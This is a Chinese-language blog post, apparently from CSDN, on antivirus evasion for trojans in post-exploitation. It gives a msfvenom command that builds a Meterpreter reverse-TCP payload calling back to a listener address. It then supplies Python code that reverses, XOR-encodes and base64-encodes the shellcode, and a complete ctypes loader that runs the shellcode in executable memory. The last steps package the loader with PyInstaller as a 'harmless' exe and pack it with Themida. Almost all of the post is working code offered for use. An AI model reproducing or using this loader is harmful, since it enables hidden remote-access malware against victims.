后渗透-木马免杀

已于 2023-03-04 11:04:13 修改
阅读量797 收藏 11
点赞数
分类专栏: 后渗透 文章标签: python 系统安全 网络安全
于 2023-02-25 23:37:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43381463/article/details/129222112
版权

木马免杀

0x00 免杀

木马免杀的方法有很多种,如反转、异或、远程加载、加壳等,这里举例反转加异或

0x01 利用msfvenom制作木马

sfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.12.135 LPORT=5555 -f py > 2.py

# -p 指定payload
# LHOST 指定接收IP
# LPORT	指定接收端口
# -f 输出文件格式
# –o 文件输出

0x02 将木马文件内容进行加工

######################################################
# 1、对木马进行处理(buf变量是生成python木马的内容)
import binascii

results = binascii.b2a_hex(buf)
new = results.decode()[::-1]
print(new) 

######################################################

# 2、将生成的new字符串进行异或运算
import base64
import binascii
def xor(tips, key):
    lkey = len(key)
    secret = []
    num = 0
    for each in tips:
        if num >= lkey:
            num = num % lkey
        secret.append(chr(ord(each) ^ ord(key[num])))
        num += 1
    return secret

# 异或加密
new = ""		# new是第一步生成的new值
encd = xor(new, 'ad')
resp = base64.b64encode("".join(encd).encode()).decode()
print(resp)

######################################################

# 3、加载器
import base64
import binascii


def xor(tips, key):
    lkey = len(key)
    secret = []
    num = 0
    for each in tips:
        if num >= lkey:
            num = num % lkey
        secret.append(chr(ord(each) ^ ord(key[num])))
        num += 1
    return secret

code = ""		# code是第二步生成的resp的值
tips = base64.b64decode(code.encode()).decode()
decd = xor(tips, 'ad')
resp = "".join(decd)
new = resp.encode()[::-1]
results = binascii.a2b_hex(new)
print(results)

# # 加载器
import ctypes
shellcode = results
shellcode = bytearray(shellcode)
# 设置VirtualAlloc返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)
# 创建一个线程从shellcode放置位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

0x03 将加载器文件打包成人畜无害的exe文件

pyinstaller -F -w 03_Loader.py

# -F 只在dist中产生一个exe文件。
# -w 只对windows有效,不使用控制台。
# -i 设置好看的ico格式的图标,加上该参数,指定图标路径。
# -p 设置导入路径

0x04 加壳

利用Themida给exe文件进行加壳——加壳工具有很多,可自行决定

image-20230225143957741

0x05 将打包的文件用安全软件进行检测

实际免杀效果需要自己测试,和写的加密方式有关

注意,查杀有两种:

一、特征码检测

二、行为检测

在通过免杀的基础上还要保证能正常运行

0x06 免杀方法汇总

  • 远程加载
  • 进程注入
  • 傀儡进程
  • 未导出API
  • 掩日
  • 等等
贫僧法号云空丶
关注
专栏目录
网络安全渗透测试之木马免杀
你在看屏幕的同时,屏幕也在注视着你
10-04 1万+
渗透测试之木马免杀
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2430
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马免杀。Webshell检测方式网上有很多免杀的一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
msf生成免杀木马
qq_56426046的博客
09-08 5692
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
木马核心技术剖析读书笔记之木马免杀
不急不躁
03-16 2277
免杀原理 基于特征码的检测 基于病毒特征码的检测方法,是目前反病毒软件最常用的检测技术。经过长时间的收集与积累,反病毒软件建立了庞大的已知病毒的特征数据库。在对可疑软件进行检测时,会从特征数据库中匹配已有特征。这种方法相对比较准确、快速,而且可以很容易地通过快速分析,结合新的模板,添加新的病毒文件特征。 特征码可以是一个简单的字符串或者代码字节序列,也可以是包含了已知恶意文件各项特点的...
网络安全木马免杀方式——加壳免杀
weixin_42340783的博客
08-02 1735
免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。
木马免杀
一纸荒芜的博客
08-03 2975
木马免杀
木马免杀全攻略(转)
weixin_33737134的博客
10-21 698
《黑客X档案》 作者:A1Pass   大家好,很高兴又与大家见面了,不知道大家对上期的文章是否满意,但是木马免杀很多啊!可是我只介绍了可执行文件木马免杀这一种,而关于脚本木马免杀只字未提,真是惭愧……     在这篇文章里我会尽量补充上篇文章的不足,系统地介绍一下脚本木马免杀方法。     关于脚本木马的查杀原理与可执行文件木马大体相同,所以在这里就不再介绍杀毒软件的查杀原理了...
渗透测试-木马免杀的几种方式
MSB_WLAQ的博客
09-28 4689
前言 免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。 1、裸
木马免杀方式
Shinyhuang_的博客
01-05 6466
前言 免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。 1、裸
木马免杀(绕过杀软)
weixin_43894771的博客
03-11 3811
仅用于学习交流 免杀是一个渗透测试中最苦恼的环节,也是一个需要学习很久的部分。 利用kali生成的木马存在的问题就是无法避免市面上大多数的杀软,及时利用kali自带的免杀也无法达到很好的免杀效果。 免杀技术 1.修改二进制文件中的特征字符 替换、擦除、修改 2.加密技术 通过加密方式使得特征字符不可读,从而逃避杀软检测 运行时分片分段的解密执行,注入进程或杀软不检查的无害文件中 3.防杀软的检测 ...
杀毒与免杀技术详解---白嫖党福音
01-15 1826
0x01 简介 不管是社工钓鱼,还是一句话木马getshell,远控,亦或者是反弹shell,都会遇到杀软waf这些大敌,当然主要还是杀软,因此我们不得不考虑免杀进而实现我们渗透测试目的。 0x02 概念 2.1 免杀类别 简单总结下我知道的免杀类别: 一句话木马绕狗(我觉得他不应该出现在这里,但为了致敬我学习的第一个免杀,把他放了出来) 文件不落地 shellcode加密 修改源码增加花指令 DLL加载 自定义加载器 指定特定的运行方式 加壳 当然还可以按照大的类别划分 静态扫描免杀
2010最新收集木马免杀工具
06-27
很齐全,配合使用可以成功摆脱最新更新的杀软,达到免杀
木马免杀全攻略
tony的专栏
10-25 2108
木马免杀全攻略[续](图) 大家好,很高兴又与大家见面了,不知道大家对上期的文章是否满意,但是木马免杀很多啊!可是我只介绍了可执行文件木马免杀这一种,而关于脚本木马免杀只字未提,真是惭愧……'j6S-U1q:s5l在这篇文章里我会尽量补充上篇文章的不足,系统地介绍一下脚本木马免杀方法。$K0N4L'V z%s2Z关于脚本木马的查杀原理与可执行文件木马大体相同,所以在这里就不再介绍杀毒软件的
木马免杀技术
晓夜璨丰
06-04 781
木马免杀,在国内应该起源于05年吧.从那时单一特征码到现在复合特征码,杀毒软件从无主动防御到有主动防御.免杀技术越来越难.但是万变不离其宗--改特征码.到现在一些辅助软件的行为查杀. 以下讲解都是以远程控制软件为例(这里补充一个概念,木马的反弹技术,就是服务端主动连接客户端.何谓主动连接呢,你只要把客户端软件在本机上开启后,中马的机子会主动连接上你的那个软件,而不必你去找他的IP,再与他连接
浅谈木马免杀(一)
谢公子的博客
04-27 5638
免杀 免杀技术全称为反杀毒技术Anti Anti- Virus(AV)简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。 在实际的渗透过程中,目标机器上一般会有杀毒软件。如Windows Defender、360安全卫士、腾讯电脑管家...
渗透实战】木马免杀
Python_0011的博客
04-14 1322
base64 sgn编码。
木马免杀处理
最新发布
weixin_58666006的博客
09-02 965
木马免杀,脚本型木马和二进制型木马
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值